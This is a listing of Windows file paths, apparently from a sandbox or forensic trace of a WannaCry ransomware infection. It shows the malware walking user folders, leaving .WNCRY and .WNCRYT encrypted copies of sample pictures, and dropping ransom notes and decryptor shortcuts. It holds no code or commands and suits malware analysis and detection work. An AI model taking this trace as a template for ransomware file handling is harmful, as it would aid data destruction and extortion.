C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\~SDBAB5.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\*
C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo
C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\~SDBAE4.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\*
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\~SDBB14.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\*
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\~SDBB54.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\*
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\~SDBBD2.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\*
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SDBBF2.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\*
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SDBC22.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\*
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\~SDBC52.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\*
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\~SDBC53.tmp
C:\Users\Default\Application Data\*
C:\Users\Default\Cookies\*
C:\Users\Default\Desktop\~SDBC54.tmp
C:\Users\Default\Documents\~SDBC55.tmp
C:\Users\Default\Downloads\*
C:\Users\Default\Downloads
C:\Users\Default\Downloads\~SDBC56.tmp
C:\Users\Default\Favorites\*
C:\Users\Default\Favorites
C:\Users\Default\Favorites\~SDBC57.tmp
C:\Users\Default\Links\*
C:\Users\Default\Links
C:\Users\Default\Links\~SDBC58.tmp
C:\Users\Default\Local Settings\*
C:\Users\Default\Music\*
C:\Users\Default\Music
C:\Users\Default\Music\~SDBC59.tmp
C:\Users\Default\My Documents\*
C:\Users\Default\NetHood\*
C:\Users\Default\Pictures\*
C:\Users\Default\Pictures
C:\Users\Default\Pictures\~SDBC5A.tmp
C:\Users\Default\PrintHood\*
C:\Users\Default\Recent\*
C:\Users\Default\Saved Games\*
C:\Users\Default\Saved Games
C:\Users\Default\Saved Games\~SDBC6A.tmp
C:\Users\Default\SendTo\*
C:\Users\Default\Start Menu\*
C:\Users\Default\Templates\*
C:\Users\Default\Videos\*
C:\Users\Default\Videos
C:\Users\Default\Videos\~SDBC6B.tmp
C:\Users\Default User\*
C:\Users\Public\*
C:\Users\Public
C:\Users\Public\~SDBC6C.tmp
C:\Users\Public\Desktop\~SDBC6D.tmp
C:\Users\Public\Documents\~SDBC6E.tmp
C:\Users\Public\Downloads\*
C:\Users\Public\Downloads
C:\Users\Public\Downloads\~SDBCCD.tmp
C:\Users\Public\Favorites\*
C:\Users\Public\Favorites
C:\Users\Public\Favorites\~SDBCFD.tmp
C:\Users\Public\Libraries\*
C:\Users\Public\Libraries
C:\Users\Public\Libraries\~SDBD1D.tmp
C:\Users\Public\Music\*
C:\Users\Public\Music
C:\Users\Public\Music\~SDBD5D.tmp
C:\Users\Public\Music\Sample Music\*
C:\Users\Public\Music\Sample Music
C:\Users\Public\Music\Sample Music\~SDBDBC.tmp
C:\Users\Public\Music\Sample Music\@Please_Read_Me@.txt
C:\Users\Public\Music\Sample Music\@WanaDecryptor@.exe.lnk
C:\Users\Public\Pictures\*
C:\Users\Public\Pictures
C:\Users\Public\Pictures\~SDBE1A.tmp
C:\Users\Public\Pictures\Sample Pictures\*
C:\Users\Public\Pictures\Sample Pictures
C:\Users\Public\Pictures\Sample Pictures\~SDBE89.tmp
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.WNCRY
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.WNCRY
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.WNCRY
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.WNCRY
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.WNCRY
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.WNCRY
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.WNCRY
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.WNCRY
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\@Please_Read_Me@.txt
C:\Users\Public\Pictures\Sample Pictures\@WanaDecryptor@.exe.lnk
C:\Users\Public\Recorded TV\*
C:\Users\Public\Recorded TV
C:\Users\Public\Recorded TV\~SDC05E.tmp
C:\Users\Public\Recorded TV\Sample Media\*
C:\Users\Public\Recorded TV\Sample Media
C:\Users\Public\Recorded TV\Sample Media\~SDC0AE.tmp
C:\Users\Public\Videos\*
C:\Users\Public\Videos
C:\Users\Public\Videos\~SDC0DD.tmp
C:\Users\Public\Videos\Sample Videos\*
C:\Users\Public\Videos\Sample Videos
C:\Users\Public\Videos\Sample Videos\~SDC0EE.tmp
C:\Users\Public\Videos\Sample Videos\@Please_Read_Me@.txt
C:\Users\Public\Videos\Sample Videos\@WanaDecryptor@.exe.lnk
C:\Users\user\*
C:\Users\user
C:\Users\user\~SDC0EF.tmp
C:\Users\user\.ms-ad\*
C:\Users\user\.ms-ad
C:\Users\user\.ms-ad\~SDC0F0.tmp
C:\Users\user\AppData\*
C:\Users\user\AppData
C:\Users\user\AppData\~SDC0F1.tmp
C:\Users\user\AppData\Local\*
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\~SDC0F2.tmp
C:\Users\user\AppData\Local\@Please_Read_Me@.txt
C:\Users\user\AppData\Local\@WanaDecryptor@.exe.lnk
C:\Users\user\AppData\Local\Adobe\*
C:\Users\user\AppData\Local\Adobe
C:\Users\user\AppData\Local\Adobe\~SDC103.tmp
C:\Users\user\AppData\Local\Adobe\Acrobat\*
C:\Users\user\AppData\Local\Adobe\Acrobat
C:\Users\user\AppData\Local\Adobe\Acrobat\~SDC104.tmp
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\*
C:\Users\user\AppData\Local\Adobe\Acrobat\DC
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\~SDC105.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\*
C:\Users\user\AppData\Local\Adobe\AcroCef
C:\Users\user\AppData\Local\Adobe\AcroCef\~SDC106.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\*
C:\Users\user\AppData\Local\Adobe\AcroCef\DC
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\~SDC116.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\*
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\~SDC117.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\*
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\~SDC176.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\~SDC1B6.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\fb9136c9-56b8-4a66-aca4-73cc2fd2f175\*
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\fb9136c9-56b8-4a66-aca4-73cc2fd2f175
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\fb9136c9-56b8-4a66-aca4-73cc2fd2f175\~SDC214.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\*
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\~SDC263.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\*
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\~SDC293.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\*
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\~SDC2D3.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\~SDC312.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\*
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\~SDC342.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cookie\*
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cookie
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cookie\~SDC391.tmp
C:\Users\user\AppData\Local\Adobe\ARM\*
C:\Users\user\AppData\Local\Adobe\ARM
C:\Users\user\AppData\Local\Adobe\ARM\~SDC3D1.tmp
C:\Users\user\AppData\Local\Adobe\ARM\S\*
C:\Users\user\AppData\Local\Adobe\ARM\S
C:\Users\user\AppData\Local\Adobe\ARM\S\~SDC3F1.tmp
C:\Users\user\AppData\Local\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\*
C:\Users\user\AppData\Local\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}
C:\Users\user\AppData\Local\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\~SDC450.tmp
C:\Users\user\AppData\Local\Adobe\Color\*
C:\Users\user\AppData\Local\Adobe\Color
C:\Users\user\AppData\Local\Adobe\Color\~SDC49F.tmp
C:\Users\user\AppData\Local\Application Data\*
C:\Users\user\AppData\Local\Apps\*
C:\Users\user\AppData\Local\Apps
C:\Users\user\AppData\Local\Apps\~SDC51D.tmp
C:\Users\user\AppData\Local\Apps\2.0\*
C:\Users\user\AppData\Local\Apps\2.0
C:\Users\user\AppData\Local\Apps\2.0\~SDC54D.tmp
C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\*
C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB
C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\~SDC56D.tmp
C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\NR814KPV.P8V\*
C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\NR814KPV.P8V
C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\NR814KPV.P8V\~SDC5BC.tmp
C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\NR814KPV.P8V\manifests\*
C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\NR814KPV.P8V\manifests
C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\NR814KPV.P8V\manifests\~SDC5EC.tmp
C:\Users\user\AppData\Local\Apps\2.0\Data\*
C:\Users\user\AppData\Local\Apps\2.0\Data
C:\Users\user\AppData\Local\Apps\2.0\Data\~SDC60C.tmp
C:\Users\user\AppData\Local\Apps\2.0\Data\CQB0Y326.MOO\*
C:\Users\user\AppData\Local\Apps\2.0\Data\CQB0Y326.MOO
C:\Users\user\AppData\Local\Apps\2.0\Data\CQB0Y326.MOO\~SDC66B.tmp
C:\Users\user\AppData\Local\Apps\2.0\Data\CQB0Y326.MOO\M3VCAP6Z.25X\*
C:\Users\user\AppData\Local\Apps\2.0\Data\CQB0Y326.MOO\M3VCAP6Z.25X
C:\Users\user\AppData\Local\Apps\2.0\Data\CQB0Y326.MOO\M3VCAP6Z.25X\~SDC6AB.tmp
C:\Users\user\AppData\Local\Boxstarter\*
C:\Users\user\AppData\Local\Boxstarter
C:\Users\user\AppData\Local\Boxstarter\~SDC6DA.tmp
C:\Users\user\AppData\Local\CEF\*
C:\Users\user\AppData\Local\CEF
C:\Users\user\AppData\Local\CEF\~SDC72A.tmp
C:\Users\user\AppData\Local\CEF\User Data\*
C:\Users\user\AppData\Local\CEF\User Data
C:\Users\user\AppData\Local\CEF\User Data\~SDC769.tmp
C:\Users\user\AppData\Local\CEF\User Data\Dictionaries\*
C:\Users\user\AppData\Local\CEF\User Data\Dictionaries
C:\Users\user\AppData\Local\CEF\User Data\Dictionaries\~SDC799.tmp
C:\Users\user\AppData\Local\Deployment\*
C:\Users\user\AppData\Local\Deployment
C:\Users\user\AppData\Local\Deployment\~SDC7D8.tmp
C:\Users\user\AppData\Local\Google\*
C:\Users\user\AppData\Local\Google
C:\Users\user\AppData\Local\Google\~SDC828.tmp
C:\Users\user\AppData\Local\Google\Chrome\*
C:\Users\user\AppData\Local\Google\Chrome
C:\Users\user\AppData\Local\Google\Chrome\~SDC867.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\*
C:\Users\user\AppData\Local\Google\Chrome\User Data
C:\Users\user\AppData\Local\Google\Chrome\User Data\~SDC8C6.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates
C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates\~SDC8D6.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics
C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\~SDC8D7.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation
C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation\~SDC8D8.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\ClientSidePhishing\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\ClientSidePhishing
C:\Users\user\AppData\Local\Google\Chrome\User Data\ClientSidePhishing\~SDC8D9.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\~SDC8DA.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments\~SDC8DB.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports\~SDC8EC.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny\~SDC95A.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\~SDC9AA.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\~SDCA08.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\~SDCA57.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\44191681-e6d2-41ed-948c-a2cdae484e83\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\44191681-e6d2-41ed-948c-a2cdae484e83
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\44191681-e6d2-41ed-948c-a2cdae484e83\~SDCAC6.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\~SDCB34.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\~SDCBA3.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\~SDCBE2.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\~SDCC22.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\~SDCC32.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\~SDCC33.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\~SDCC34.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\~SDCC35.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\~SDCC36.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\~SDCC66.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\~SDCC96.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\~SDCCD5.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\~SDCD34.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\~SDCD74.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\~SDCDB3.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\~SDCE02.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\~SDCE51.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\~SDCE91.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\~SDCEB1.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\~SDCEE1.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\~SDCF01.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\~SDCF22.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\~SDCF71.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\~SDCF91.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\~SDCFB1.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\~SDCFE1.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\~SDD04F.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\~SDD09F.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\~SDD0DE.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\~SDD10E.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\~SDD14D.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\~SDD16E.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\~SDD1AD.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\~SDD1ED.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\~SDD23C.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\~SDD25C.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\~SDD29C.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\~SDD2CB.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\~SDD2EC.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\DesktopSharingHub\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\DesktopSharingHub
C:\Users\user\AppData\Local\Google\Chrome\User Data\DesktopSharingHub\~SDD32B.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies\*
C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies
C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies\~SDD37A.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded\*
